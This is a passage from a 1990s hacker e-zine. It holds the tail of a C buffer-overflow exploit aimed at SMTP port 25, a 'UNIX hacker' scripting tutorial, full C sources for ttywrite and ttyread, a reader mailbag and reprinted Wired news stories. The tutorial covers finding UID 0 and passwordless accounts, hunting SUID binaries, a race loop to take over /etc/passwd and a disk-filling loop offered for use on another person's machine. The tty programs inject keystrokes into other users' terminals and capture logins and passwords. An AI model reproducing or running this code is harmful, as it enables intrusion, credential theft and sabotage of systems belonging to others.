struct hostent *hp;
if(argc<2)
{
/* Carparts original error message was a bit cryptic */
printf("Usage: %s site.to.exploit\n", argv[0]);
exit(-1);
}
ptr = buf;
for(i=0;i<=4096;i++) buf[i] = NOP;
ptr += i;
memcpy(ptr,shellcode,sizeof(shellcode));
ptr += sizeof(shellcode);
clear = commands;
memcpy(ptr,clear,sizeof(commands));
ptr += sizeof(commands);
memcpy(ptr,"3824",4);
system(clear);
printf("Connecting To %s\n",argv[1]);
hp = gethostbyname(argv[1]);
if(hp==NULL)
{
printf("Unknown Host\n");
exit(-1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
send(sock,buf,sizeof(buf),0);
close(sock);
printf("Exploit Successfully Executed\n");
return(0);
}
[Scripting in UNIX....................................................Nartrof]
There are two basic skills that are necessary for every UNIX hacker
to learn. They are C programming and UNIX shell scripting. A UNIX
shell script is merely a file that contains a series of UNIX shell
commands. However through the use of various control structure a
shell script can become a very powerful tool.
The first line in any shell script should declare which shell the
script is to be executed in. For example:
#!/bin/sh
The Bash shell is the shell that is normally used for scripting.
Once upon a time there were bugs in the C shell that led many people
to become wary of and dislike it. The bugs have been fixed years
past but the dislike and the wariness remain.
After the shell has been declared, comments should be used to explain
the purpose of the script. Comment are preceded with a pound sign.
This is not to be confused with the execution shell which is declared
with a pound sign and exclamation mark. For example:
--------------------------- cut here ---------------------------
#!/bin/sh
# This line declares what this script does.
# However this script doesn't do anything yet.
--------------------------- cut here ---------------------------
After the scripts purpose has been stated, command execution begins.
The next script makes use of the grep utility. grep is one of my
favorite UNIX utilities which can be used for various different
searching purposes. I often use it to search for certain types of
files and user accounts. The next script uses the grep utility to
find accounts with a user or group ID of 0:
--------------------------- cut here ---------------------------
#!/bin/sh
# This script finds UID and GID 0 accounts.
grep ':00*:' /etc/passwd
--------------------------- cut here ---------------------------
To execute the script you will have to make it executable. You can
do this by using the following command at the shell prompt:
chmod 755 scriptname
The script is executed by typing it's name and path at the shell
prompt. If we also wanted to find unpassworded accounts we could
also include the following command line in the script:
grep '^[^:]*::' /etc/passwd
The next script will perform search for both UID 0 and unpassworded
accounts and and seperate the output:
--------------------------- cut here ---------------------------
#!/bin/sh
# This script find UID & GID 0 accounts and unpassworded accounts.
# This will find GID & UID 0 accounts
echo "The following accounts have User or Group privileges of 0."
echo ""
grep ':00*:' /etc/passwd
echo ""
# This will find unpassworded accounts.
echo "The following accounts have no password."
echo ""
grep '^[^:]*::'
--------------------------- cut here ---------------------------
Notice that in the previous script I used comments to explain what
each part of the script does. This is a very important part of
scripting and programming. Comments allow others to understand what
you write and to help you to remember what each part does. This is
especially important as your scripts and programs become longer and
more complicated.
In the example of the previous script it may be desireable to have
the script not print out the root account as UID 0. You should
already know this and you may not want to bother with it on your
screen. If so you could write the script as follows:
--------------------------- cut here ---------------------------
#!/bin/sh
# This script find UID & GID 0 accounts and unpassworded accounts.
# This will find GID & UID 0 accounts
echo "The following accounts have User or Group privileges of 0."
echo ""
grep ':00*:' /etc/passwd | \
awk -F: 'BEGIN {n=0}
$1!="root" {print $0 ; n=1}
END {if (n==o) print "No accounts were found."}'
echo ""
# This will find unpassworded accounts.
echo "The following accounts have no password."
echo ""
grep '^[^:]*::'
--------------------------- cut here ---------------------------
The awk utility is a powerful scripting language that many UNIX gurus
use to perform a variety of functions. The snippet of awk script in
the previous example removes the root account from the grep listing
and prints out the other accounts in the listing. If no accounts
were found to be UID 0 then it tells you "No accounts were found."
Another use for a shell script might be to search for program with
SUID privileges. SUID programs are often used to exploit for root
privileges through buffer overflows and other problems. Which files
will be exploitable on any system depends on the operating system
that is running on the computer. SUID files can be found using the
find command. For example:
find / \ ( -perm -2000 -o -perm -4000 \) -print
This command line will find both SetUserID and SetGroupID privileged
programs. If you were looking for certain files to see if they were
present with SUID privileges you could redirect finds output to grep
as in the following script.
--------------------------- cut here ---------------------------
#!/bin/bash
# This script will be used to find SUID program on a system. It will also
# redirect the output of it's search to grep. grep will search for the
# program orwell, which you know to be exploitable.
echo "The following program is SUID and is known to be exploitable."
echo ""
find / \ ( -perm -2000 -o -perm -4000 \) -print | grep 'orwell'
--------------------------- cut here ---------------------------
While the scripts demonstrated so far are simple and don't do much
more than you could easily do by hand, the UNIX shell does support a
number of control structures. One of the most widely used control
structures is the while-do loop. The while-do loop takes the form
while [condition]
do
[command]
[command]
done
What the while-do loop does is repeat the command listed between do
and done until the condition is met. The most common way to use
this loop is to assign a value to a variable and to end the condition
when that variable reaches another, different, value. If for example,
you script increased the variable COUNT by 1 when it finished
successfully then you could use the while-do loop to execute the
commands in your script until COUNT is no longer equal to it's
initial value.
--------------------------- cut here ---------------------------
COUNT=1
# COUNT now equals 1
# The loop will now start. It will end when count is no longer equal
# to 1.
while COUNT=1
do
....
the other commands in your script
....
done
--------------------------- cut here ---------------------------
When COUNT is no longer equal to 1 the loop will stop. The while-do
and other types of loops used in UNIX are very powerful for usage as
programming tools. At one time however they were frighteningly
dangerous hacking tools.
The following script for example would cause the password file to be
owned by the user who ran the script.
--------------------------- cut here ---------------------------
#!/bin/bash
# This script would cause the the password file to be owned by you.
# This should only work on older UNIX boxes.
# This script exploited a race condition that occured when mkdir attempted to
# perform the two different function required to create a new directory.
# This script creates a directory called 'crap'. It then immediately removes
# it. The script creates a race condition that eventually causes the
# directory to be replaced by a link to /etc/passwd. /etc/passwd then
# becomes owned by you. If this still works the box is old.
while : ; do
nice -10 (mkdir crap; rm -fr crap) &
(rm -fr crap; ln /etc/passwd crap) &
done
--------------------------- cut here ---------------------------
The same type of loop was also used to crash systems by creating
kernel panic or using all of the available blocks on the hard disk.
If disk quota is not enabled the following loop will still work.
It's nasty but if you just owned some punk's box and feel like giving
him a rough time....Enjoy!
--------------------------- cut here ---------------------------
#!/bin/bash
# This script is lame but it does fit the topic of while-do loops so you make
# the call.
while : ; do
mkdir ms-sucks
cd ms-sucks
done
--------------------------- cut here ---------------------------
The previous two scripts do their dirty work through the use of
endless or non-terminating loops. Endless loops are often used by
newbies to crash systems and wreak havoc but it is very likely to
encourage a commercial system to spend more money to catch you so
watch out. You should however understand the concept of both endless
and conventional while-do loops.
There are quite a few other UNIX control structure available and I do
hope to cover them in the next issue of THTJ. For now try to
experiment with what I covered here. Invent something new and be
creative. Once you reach the point of dreaming in UNIX shell scripting
will be a powerful tool which you can use to create your own exploits.
Exploits are usually system specific otherwise I would have included a
few here. Be creative, create your own bugs and wreak havoc (on your
own system of course). Until then ta,ta.
-=*Nartrof*=-
/* Greetz go out to BlakAngel, TdLord, Iceburg, WyseGuy,
Dovee, Kara, Oxygen, T1, ac|ds, Astra, Oxygen, Coredata,
Warpy,Pentium, Pan51, Nalius, Confinest and Ct2 */
[ttyread.c and ttywrite.c...............................................simon]
/* ttywrite.c - by simon <simon@yahoo.com> part of my tty suite
*
* This program bypasses the normal superuser check for stuffing chars
* into other people's terminals. All you need is write permission on
* the user's terminal.
*/
#include <sgtty.h>
#include <stdio.h>
main(argc, argv)
char **argv;
{
register int fd; /* file descriptor */
char ch; /* current character */
char name[100]; /* tty name */
struct sgttyb sb; /* old and new tty flags */
struct sgttyb nsb;
if (argc < 2)
{
fprintf(stderr, "ttywrite ttyname\n");
exit(1);
}
argv++;
if (**argv == '/')
strcpy(name, *argv); /* build full name */
else
sprintf(name, "/dev/%s", *argv);
if (setpgrp(0, 0)) /* clear my process group */
{
perror("spgrp");
goto done;
}
if (open(name, 1) < 0) /* open tty, making it mine */
{
perror(name);
exit(1);
}
fd = open("/dev/tty", 2); /* open read/write as tty */
if (fd < 0)
{
perror("/dev/tty");
exit(1);
}
ioctl(0, TIOCGETP, &sb); /* go to raw mode */
nsb = sb;
nsb.sg_flags |= RAW;
nsb.sg_flags &= ~ECHO;
ioctl(0, TIOCSETN, &nsb);
sigsetmask(-1); /* stop hangups */
printf("Connected. Type ^B to exit\r\n");
while (1)
{
if (read(0, &ch, 1) <= 0) break;
if ((ch & 0x7f) == '\002') break;
if (ioctl(fd, TIOCSTI, &ch)) /* stuff char on "his" tty */
{
perror("\r\nsti failed\r");
goto done;
}
ch &= 0x7f; /* echo it for me */
if (ch < ' ')
{
if ((ch == '\r') || (ch == '\n'))
{
write(1, "\r\n", 2);
continue;
}
ch += '@';
write(1, "^", 1);
write(1, &ch, 1);
continue;
}
if (ch == '\177') {
write(1, "^?", 2);
continue;
}
write(1, &ch, 1);
}
done: ioctl(0, TIOCSETN, &sb); /* reset tty */
}
------------------------------------------------------------------------------
/* ttyread.c - by simon <simon@yahoo.com> part of my tty suite
*
* This will read stuff off of other user's tty.
*/
#include <stdio.h>
#include <signal.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/termios.h>
#define DEBUG 1 /* Enable additional debugging info (needed!) */
#define USLEEP /* Define this if your UNIX supports usleep() */
#ifdef ULTRIX
#define TCGETS TCGETP /* Get termios structure */
#define TCSETS TCSANOW /* Set termios structure */
#endif
handler(signal)
int signal; /* signalnumber */
{ /* do nothing, ignore the signal */
if(DEBUG) printf("Ignoring signal %d\n",signal);
}
int readandpush(f,string)
FILE *f;
char *string;
{
char *cp,*result;
int e;
struct termios termios;
result=fgets(string,20,f); /* Read a line into string */
if (result==NULL)
{ perror("fgets()");
return(1);
}
if (DEBUG)
{ printf("String: %s\n",string);
fflush(stdout);
}
ioctl(0,TCGETS,&termios); /* These 3 lines turn off input echo */
/* echo = (termios.c_lflag & ECHO); */
termios.c_lflag=((termios.c_lflag | ECHO) - ECHO);
ioctl(0,TCSETS,&termios);
for (cp=string;*cp;cp++) /* Push it back as input */
{ e=ioctl(0,TIOCSTI,cp);
if(e<0)
{ perror("ioctl()");
return(1);
}
}
return(0);
}
main(argc,argv)
int argc;
char *argv[];
{
/* variables */
int err;
FILE *f;
char *term = "12345678901234567890";
char *login = "12345678901234567890";
char *password = "12345678901234567890";
if (argc < 2)
{ printf("Usage: %s /dev/ttyp?\nDon't forget to redirect the output to a file !\n",argv[0]);
printf("Enter ttyname: ");
gets(term);
}
else term=argv[argc-1];
signal(SIGQUIT,handler);
signal(SIGINT,handler);
signal(SIGTERM,handler);
signal(SIGHUP,handler);
signal(SIGTTOU,handler);
close(0); /* close stdin */
#ifdef ULTRIX
if(setpgrp(0,100)==-1)
perror("setpgrp:"); /* Hopefully this works */
#else
if(setsid()==-1)
perror("setsid:"); /* Disconnect from our controlling TTY and
start a new session as sessionleader */
#endif
f=fopen(term,"r"); /* Open tty as a stream, this guarantees
getting file descriptor 0 */
if (f==NULL)
{ printf("Error opening %s with fopen()\n",term);
exit(2);
}
if (DEBUG) system("ps -xu>>/dev/null &");
fclose(f); /* Close the TTY again */
f=fopen("/dev/tty","r"); /* We can now use /dev/tty instead */
if (f==NULL)
{ printf("Error opening /dev/tty with fopen()\n",term);
exit(2);
}
if(readandpush(f,login)==0)
{
#ifdef USLEEP
usleep(20000); /* This gives login(1) a chance to read the
string, or the second call would read the
input that the first call pushed back ! /*
#else
for(i=0;i<1000;i++)
err=err+(i*i)
/* error /* Alternatives not yet implemented */
#endif
readandpush(f,password);
printf("Result: First: %s Second: %s\n",login,password);
}
fflush(stdout);
sleep(30); /* Waste some time, to prevent that we send a SIGHUP
to login(1), which would kill the user. Instead,
wait a while. We then send SIGHUP to the shell of
the user, which will ignore it. */
fclose(f);
}
[The Mailroom...........................................................scud_]
*NOTE*: From now on, all e-mail addresses, and message headers will
be ripped out of the e-mail before being released into the Mailroom!
Now you can feel free to e-mail us and not have millions of flame
mails waiting for you the next time you open you e-mail!
---
Whatz up. Have a nice day
[The Sky.]
While others may argue about whether the world ends
with a bang or a whimper, I just want to make sure
mine doesn't end with a whine.
Help! i am za beginner hacker and i need help on how to hack.. i need
detailed info on how to hack or some addresses might help me a lot.
Please can youi help me i only hacked into something once by acciddent!
--Barbara Gordon
[ Well, until Havoc Bell Systems releases releases their guide to hacking,
look at hackkit by i-e. You can find it on rootshell.com, or possibly at
thtj.com ]
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com
[No, no I don't.]
---
I want a scanner.
[ I want a BMW M3. ]
---
I am kinda new into the world of hacking
My local library has a BBS and i have 250 dollars worth of outstamding
fines how can i hack the system?I was also wanodering if I could be part or
your web page or something
e-mail me back
[ 1. How the fuck did you manage to get $250 worth of fines?
2. Well, you need to be a *little* more specific on what type of BBS this
library runs.
3. THTJ doesn't bother with BBSes anymore, most people have moved to the
Internet.
4. Part of my web page? What do you mean? ]
---
was hackers here, seem's there is nothing afet the big "Freez..", well gotta
run, shurE miss the old one.......
[ SNeitz, what the fuck is this 'Freez' you keep speaking of? ]
---
Jus wanted to tell u guys that u r the greatest.
the best zine i have ever read.None of that newbie guide shit.Just clear
concise info. Luv it man.
Don ever stop .
[ We aim to please. ]
---
Hello
I was wondering if u can answer a question for me. Wel I heard that its
possible to enter someone hard drive through telnet, i would like to
know if this is true and if it is how would I go about doing it. Or are
there other programs that can do it besides telnet.
Thanks,
LogX
albender@geocities.com
[ Anything is possible. It all depends on several variables, which I will
leave for you to find out. ]
---
my x gf is pissing me off. is there any way i can hack into her comp through
my tcp/ip connection. if there is please send me instructions on how to.
thanx
** *******
[ If there is a will, there is a way. Find out that way yourself. ]
---
In thtj16, [which i very much enjoyed] i noticed your article about
NetBIOS attacks and such.. Well i found that each time i tried it said
NBT DRIVER 1 NOT FOUND
So inturn screwing up readers. Well, you really should put in thtj 18 or
something that you have to ENABLE NetBIOS in TCP/IP networking settings.
Just to let ya know
Ld
[ Thanks for passing along the info. ]
---
Why aren't you takeing any members
[ Because we dont want AOLers such as yourself bugging us about joining.
So, we closed our doors, and you have ruined it for everyone else. ]
---
hi i want to learn how to hack. I've spent hours searching the net, and all
i am getting is bits and pieces of how to hack a Unix. I am learn dick all
can you email me and tell me step by step what i need to do to start
hacking. i would be most gratful, if you can't can you atleast email me at
pparker@cyberlink.bc.ca and refer em to a really good site that will teach
me everthing i need to know. i really want to learn to hack. maybe you
could email me once a week with lessons on how to hack, starting at the
beginning. anyway thank you for reading this but could you plese email me
back.
thanks :-)
[ Lessons? Hacking 101 is a self taught class. Go find hack_kit2.0 and
read it for an intro to hacking. ]
---
Hey Scud,
I like your zine. Just wanted to make a comment that I think that maybe
should should write the journal in HTML format. It would add allot to the
zine, I'm sure u know, of the advantags. Thanxs, keep it up.
BTW, PGP public key?
nakar
[ After issue 6 it was too much work to convert 150+ k of text to
HTML, so we stopped making thtj in HTML. If one of you out there
wants to do it, by all means go ahead and let us know. ]
---
Dear Scud-0 , I would like to say your mag rocks!!!
also do you know how to cause a little havoc at certain stores?
if you know the following just pass the info along :
at certain chain stores(or stores with computer on display like Wal mart,
K mart,ect) you can get passed the password on the screen saver by pressing
Ctrl+Alt+Delete and tell it to end the screen saver or you can sometimes
press Alt+Tab to goto the next open window till my next letter happy hacking
Whisper Death
@-}--------
---
I need programs but everything is a zip file where can I find exe files to
use?
Or how can I change my computer to use zip files?
just asking for help, thanks
SAINT
[ You want to be a hacker and you cant figure out how to use zip files? ROFLOL
(ten minutes of laughing) Look up winzip or pkzip on the world wide web. ]
---
Subject: NBC News 12/14/97
Was it me or was that guy in the report on "cyber crime" "hacking" with
Microsoft Word?
[ I dont know, I missed the show, but most likely it was Word, if NBC ran it.]
---
Hello,
I'm looking for a "punter". I understand that they are typically
against aol TOS regulations, but in a room that was being torn apart by
fools, an AOL guide was asked about them. She said she could support their use
in only the most unbearable circumstances. That certainly can happen.
Can anyone tell be how to aquire one...or a direction to begin?
Appreciate any help.
Josh.
[ Nope, I cant tell you, I dont use AOL.]
---
hey what's going on in cyber space there is nothing to do tonight . so I'm
on the net with my friends to see what we can get into .,
got any pointers to give to a new hacker wanna be if so email me back all
the info will be very useful in my boring life
laters
mogul
[ Yea, the inet is pretty boring. Make it more lively by getting hack-kit2.0
from rootshell.com and try out some of the code and methods they use, it
should hopefully make things more fun for you. ]
---
I'm looking to find new friends in the columbus, cincinnatti,ohio area.Thank
you in advance for your reply.
Yogi4069
[ what the fuck? since when did thtj become a dating service? Ok, Yogi was
only asking for friends, but thtj is not a friends network, it is a zine.
oh well, consider it done. ]
---
I would like to learn how to become a very good hacker.. I've looked
all over, and went to hacker dot com. That is where I came across your
link, I would like to become as good as you guys. If you are willing to
teach me bit by bit, please email me back.
[ Go get hack-kit2.0 like i told everyone else to. ]
---
If you know any hackers/phreaks from the 813 area code please have
them contact me at:
axessphreak@most-wanted.com
[ consider it done. ]
---
I AM ON MY SISTERS SCREEN NAME .BECAUSE MY DAD HAS ME LOCKED OUT . I HUMBLY
ASK FOR SOME HELP IN THIS LOCK OUT MATTER. ANY SUGGESTIONS PLEASE REPLY TO
SAAFIR21@AOL.COM
[ NEXT TIME DONT WRITE IN ALL CAPS!! ]
---
Hey! I've heard from friends that you wanted to know what HAVOC: THE
PROGRAM is. Well, I needed alot of encouragement, but I am now willing
to say that I AM THE WRITER OF HAVOC: THE PROGRAM. If you want to find
out more about it, e-mail me at Xabbu@hotmail.com.
By the way, I love your zine!
!Xabbu
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
[ woo hoo. Im overjoyed. Next time just send me the facts. I can barely
contain my excitement. ]
---
hello.....
my nick is sandspidr
i am relativley new to the hacking
scene but am learning rapidly.
but anyways, here is something i thought would interest u.
the other day while i was shopping at Giant Eagle, i noticed
this lame ass waste of space machine called coinstar. i was
looking at it (trying to find a way to steal money) when i notice
a fone line running into the machine. i came back later in the day
with a phone and ani'ed the number. so i went home and dialed in
with my modem. the system is QNX systems. i havent done a thourough
investigation on the system. i am looking for a service number to see
if i can find an idiot to give me the login and password.
more later.....if u want
sandspider
bbrains@hotmail.com
[ Sounds cool, keep us informed. ]
---
I found that article 9 is very very true. We are being monopolize and
manipulated. Though I'm not a hacker but just a simple person who had no
choice to comply to large corporate manufactured software. Shit I hate
this.
[ Down with Big Brother! ]
[The News...........................................................KungFuFox]
1 : Suggestion to Bill Gates for a Microsoft Christmas
2 : Twice Removed: Locked Up and Barred from Net
3 : Pretty Good Privacy Not Looking So Great
4 : Sixth Coming
5 : Hackers break into Yahoo!, call for release of Mitnick
_____________________________________________________________
Suggestion to Bill Gates for a Microsoft Christmas
by Jon Katz
25.Nov.97 -- Dear Mr. Gates,
Christmas comes but once a year, and it's never too early to start tackling
that holiday shopping list. Yours could be a whopper.
I know you're buying some neat stuff for yourself: that gazillion-dollar
Tommorrowland near Redmond, Michelangelo's old notebooks, Napoleonic
bric-a-brac, and a US$21 million jet you just paid for out of your pocket,
you lean and mean little corporate devil.
But you do have $40 billion in the bank, and before you order that futuristic
new yacht, please take a few seconds to consider an idea I had in the middle
of the night. This idea would do you worlds of good. It would establish
Microsoft world domination once and for all, and justifiably so. The
beleaguered folks at Netscape would run up the white flag.
Those pesky bureaucrats at the Justice Department would soon be scurrying for
cover, and you'd spark yet another - the biggest ever - wave of
Gates-is-amazing hype in the media.
This could be big. It would demonstrate that you are, in fact, a true
visionary, and show the amazing power of new kinds of companies like yours to
shape the world for the better.
Listen, I know you're not exactly up nights worrying about people like me -
gnats on the elephant's butt - but this would also have the added effect of
shutting me and my ilk up for good. In some quarters, like my house, that
would be seen as no small miracle.
Here's the idea: Wire each and every classroom in America. Various estimates,
from private companies to the Commerce Department, have put the price tag of
wiring up all the United States' schools properly at anywhere between $5
billion and $9 billion, depending on how lavishly and comprehensively it's
done. The usual model is five computers to a classroom, plus the software,
staff, phone lines, maintenance, security, and space to use them properly.
The shocking thing about the low and high ends of these estimates is that you
could write a check for either amount and still install those
climate-controlling computer chips in every room of your new house. This
could cost you as little as 10 percent of your worth or, at the most, 20
percent.
And think about it: Overnight, you could wipe out the gap between the
technology haves and have-nots. You could virtually guarantee employment
opportunities to a whole generation of kids being left behind, while
journalists and politicians obsess about porn on the Net.
You would earn a knock-out place in history. You would show that the right
company, managed in the right way with the right heart and vision, can be
more effective in the digital age than the president of the United States and
the vast bureaucracy he ostensibly leads. And do much more good in a short
time than the US Congress does in any given generation.
While these people flap their gums about morality on the Internet, and warn
about online perverts and militias, you could, all by yourself, address and
eradicate in a couple of years the real moral issue facing Americans and new
technology - making sure everybody has equal access to it.
In the urban underclass, for example, federal statistics show that only a
tiny fraction of people own computers or have online access. The number isn't
rising, either. These people are being condemned and sentenced to cultural
and educational deprivation and economic disadvantage.
For all Mr. Clinton and Mr. Gore's technoblather about that bridge to the
21st century, Congress and the administration are much too busy posturing,
scheming, fundraising, and devouring one another to do anything meaningful
about getting many of us there.
You could give Americans one of their greatest Christmas presents ever. You
could put computers in every classroom. For that matter, if you wanted to dig
a little deeper, you could make sure every American kid who wants one has
one.
You wouldn't even have to write one single check or lower your balance in one
shot. A couple billion dollars a year for four or five years would do the
trick. For that matter, you could set up some sort of fund and donate
computers off the interest alone. Other corporations would perhaps compete
with you to do similar acts of good, all in the interest of image-burning and
market share. Talk about vision and leadership!
This would be a hummer of a Christmas gift. It would sure convince me you
were a new kind of corporate leader and a hell of a nice guy to boot, as so
many journalists have been writing.
And nobody much would even dare to argue Microsoft was too powerful for the
nation's good. And, as I fiddle with my PowerBook's calculator, it would
still leave you with about $30 billion, at least. This could be a modern
Christmas Carol.
Thanks for listening. I'm sure I'll be hearing from you, one way or the
other. And happy holidays.
(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________
Twice Removed: Locked Up and Barred from Net
by Steve Silberman
3.Dec.97 -- When US District Court Judge Sam Sparks sent Chris Lamprecht to
the Federal Correctional Institution in Bastrop, Texas, in 1995, the
24-year-old hacker sobbed before the bench. A stint in the federal pen was
terrifying enough, but the judge had tacked an unusual condition onto his
70-month sentence. Though Lamprecht was being sent to Bastrop for money
laundering - not the hacking that earned him the handle "Minor Threat" -
Judge Sparks stipulated that Lamprecht was forbidden to access the Internet
until 2003.
"I told the judge computers were my life," Lamprecht recalled.
Any case that involves computers and a boyish, fair-skinned defendant is
bound to get press, but things have changed since Swing magazine billed
Lamprecht as "the first person to be officially exiled from cyberspace." If
the young hacker was the first to be exiled from the online world by law, he
now has plenty of company, following the circulation of an internal memo at
the Federal Bureau of Prisons last year, which set in stone a federal policy
of keeping prisoners - and even many parolees - offline.
According to the federal view, logging on is simply incompatible with
incarceration. As chief bureau spokesman Todd Craig states, in bureaucratese,
"Access to the Internet is not a necessary tool for the correctional process"
- which means that with more than 1.6 million people locked up in the United
States alone, and thousands of parolees subject to similar restrictions even
as they attempt to rejoin modern life, a significant population is being left
behind by the network revolution.
What's at stake? As more and more jobs are wired into the Net and the Web,
the possibility that former offenders will be able to find employment after
incarceration becomes more and more remote - which undermines the very
bedrock of the correctional process, asserts Jenni Gainsborough, spokeswoman
for the American Civil Liberties Union's National Prison Project.
"The aim of our prisons should be to release people who are able to
reintegrate themselves into society," she explains. "But no politician wants
to appear soft on crime. Nobody thinks about what's actually useful to reduce
the recidivism rate."
A poster boy for keeping prisons unwired
Mention the words prisoner and Internet in a sentence, and the same
object-lesson will come up over and over again: the case of George
Chamberlain, a sex offender incarcerated at Lino Lakes state prison in
Minnesota, who used his position as manager of computer services for a
venture called Insight Inc. to download child pornography from the Net while
sitting in jail.
Chamberlain was a poster boy for keeping prisoners as far away from a modem
as possible. He not only siphoned 287 erotic images off the Net and encrypted
them on an optical drive behind the pass phrase "They cannot commit me," he
also compiled lists of thousands of children's' names, and chitchatted with
other pornographers through an anonymous remailer.
"The idea that a prisoner had this kind of access to the Internet and was
able to collect explicit child pornography and communicate with others on how
to hide it," US Attorney David Lillehaug declared last March, "is almost
unbelievable."
The Chamberlain case seemed all too believable, however, given a statement
issued by the US Parole Commission just three months earlier. The commission,
"responding to increased criminal use of the Internet," approved
"discretionary use of special conditions of parole that would impose tight
restrictions on the use of computers by certain high-risk parolees."
A spokesperson for the Parole Commission declined to answer questions about
the number of parolees currently subject to restrictions on computer use,
which include a ban on encryption, screening of online activity by monitoring
or blocking software, compulsory daily logging of all Web sites visited, and
unannounced searches of drives and disks by parole officers.
Federal Bureau of Prisons spokesman Craig equates the ban on computer use by
inmates to restrictions on use of the telephone. "They can make 15-minute
calls to pre-approved numbers, like family and clergy," Craig says. It would
be impossible, he says, to pre-approve forays into the online world in the
same way.
In its press release, the commission said it acted "after noting the surge of
'how-to' information available on the Internet and other computer online
services relating to such offenses as child molestation, hate crimes, and the
illegal use of explosives."
"That's complete BS," charges Stanton McCandlish, program director for the
Electronic Frontier Foundation. "There was no alarming increase in that kind
of 'how-to' information on the Net. There was an increase in publicity about
politicians like Dianne Feinstein, who used those fears as justification to
limit use of the Internet."
McCandlish points out that last June's Reno v. ACLU decision by the Supreme
Court sent a message that the court considers the Net as much subject to
First Amendment speech protections as the printed word. Comparing broad
prohibitions on the use of computers by prisoners and parolees to banning the
act of writing by those in prison, McCandlish predicts that "the issue is
going to heat up" in the coming year. The EFF is "waiting for a good, solid
legal challenge" to arise before getting involved in a case, McCandlish says.
The world's best-kept secrets
A small California businessman named John Danes runs an outfit called
Inmate.com, charging prisoners US$70 to design and maintain a personal
homepage and an email address for three months. Each week, Danes prints out
the incoming mail, peruses it for forbidden content like pornography or
communication from minors, and forwards it to the inmates via snail mail. At
present, nearly 70 male prisoners and three women have homepages at
Inmate.com. The majority of the inmates are black or Hispanic; several of the
pages maintain the author's innocence; many are an invitation to romance.
Ironically, the ACLU's Gainsborough attributes some of the public's fear
about convicted criminals having a gateway to the Net to the publicity given
to Web sites like Inmate.com and Dead Man Talkin' - sites that are put up by
friends of prisoners who do not themselves have access.
"Serial-killer homepages and prisoner sites contribute to the public
perception that there's a huge use of the Net by these people to advertise
their evil ideas," Gainsborough says, while affirming her support for the
right of prisoners to express themselves.
One page on the Inmate.com site asks, "Have you ever wondered what it's like
to live in another world right here on Earth? What would you do if you
suddenly fell from grace? Prisons hold some of the world's best-kept
secrets." Secrets are one thing, Gainsborough observes, that prisoners are
not allowed to keep.
"In many prisons, even [typewriters with built-in memory] are forbidden," she
says. "There's always this fear of prisoners hiding this stuff away - so the
idea of computers where people could really keep stuff hidden is very
frightening."
In July 1996, a promising computer-training program at the Washington State
Reformatory was terminated when it appeared that the prisoners were learning
too much about computers - that is, more than prison officials knew.
Mike Williams, associate superintendent at the reformatory, was head of
security for the program, which was a pilot for a statewide effort that would
have allowed prisoners to learn how to use business software like Microsoft
Excel, PowerPoint, and Word.
"The inmates learned a lot of good stuff," Williams acknowledges. "They were
able to learn a trade while in prison, so that they might have been actually
able to get a job in that area when they got out. This was like real-world
vocational training."
So why was the innovative program scrapped, rather than ported to every
jailhouse in the state?
"Our superintendent thought it was a manageable pilot program," Williams
recalls, "but the key figures who needed to approve it up in Olympia decided
to put an end to it. We had inmates learning more about computers than we had
staff time to keep an eye on them. We couldn't keep up with them."
The fear that prisoners would use encryption or other electronic means to
cloak escape plans was a chief concern. "It was a cat-and-mouse game. We had
to load the software for them, and there was no money allocated to hire more
officers to do that kind of thing," Williams says. Though at least one inmate
claims that graduates of the program had landed good jobs upon release, state
deputy director of prisons Jim Blodgett - one of the "key figures" in the
state capital who decided to shut the gate on the pilot effort - told a
reporter, "We couldn't see the value in keeping it. We had staff not knowing
what was going on."
If the object of incarceration is to ensure that prisoners remain at least as
ignorant of current technologies as untrained prison staff, the federal
policy will be deemed a success. But as the Net touches every area of our
experience - from our most intimate relationships to our responsibilities as
participants in a democratic society - more and more of those on the outside
of the bars are coming to feel, with Lamprecht, that "computers are our
lives," or are inextricably linked with our lives.
And those on the inside are destined to be released into a life for which
they are even more unprepared than former offenders were in the past.
(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________
Pretty Good Privacy Not Looking So Great
by James Glave
3.Dec.97 -- Legendary cypherpunk and former PGP Inc. chief technology
officer Phil Zimmermann is in the uncomfortable position of having to eat
his words.
Following Monday's US$35 million cash acquisition of PGP by Network
Associates, the man who once testified before the Senate that key recovery
could "strengthen the hand of a police state" now works for a company that
actively promotes it.
Reaction from e-privacy activists was swift and harsh.
"The users of PGP can no longer rely on the credibility of Phil Zimmermann to
ensure that the product is everything that they've been promised it's been
previously," said Dave Banisar, attorney for the Electronic Privacy
Information Center and co-author of The Electronic Privacy Papers
Network Associates, formerly known as McAfee Associates, is an active member
of the Key Recovery Alliance, an organization that lobbies Congress for key
recovery that would grant law enforcement agencies back-door access to
private encrypted communications.
Network Associates and other companies support key recovery because it would
allow them to export strong crypto software without bothering to make a
separate nonrecoverable version for the domestic market. The Commerce
Department forbids export of the strongest available encryption without
elaborate promises from manufacturers to develop key recovery features. Thus
many companies are forced to develop both export and domestic versions of
their software, each with differing crypto strengths.
But Zimmermann, a pioneer of strong encryption, has spent years crusading
against key recovery, calling it an invasion of privacy. And the most recent
release of PGP's encryption software allows users to disable key recovery.
"People should give their consent to use [recovery]," Zimmermann said. When
asked whether future versions of the package will retain that option,
Zimmermann replied, "Certainly, as long as I have anything to say about it."
Zimmermann's new title at Network Associates is "fellow," but he declined to
comment on exactly what authority and responsibility that confers. Meanwhile,
Phil Dunkelberger, PGP's former president and CEO, was named general manager
of Network Associates' Total Network Security Division.
"It's going to take some time to figure things out," said Zimmermann.
EPIC's Banisar was less diplomatic and postulated that Zimmermann's new title
reflected a clash of values between him and Network Associates on key
recovery.
"We have a number of fellows here, and they are usually unpaid volunteers,"
Banisar said.
"It will require a fundamental examination by human rights groups and others
about whether any newer versions of PGP are truly trustworthy," said Banisar.
Network Associates could not be reached for comment.
(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________
Sixth Coming
by Stephen Jacobs
1.Dec.97 -- The Commodore Amiga, dubbed "the world's first multimedia PC" by
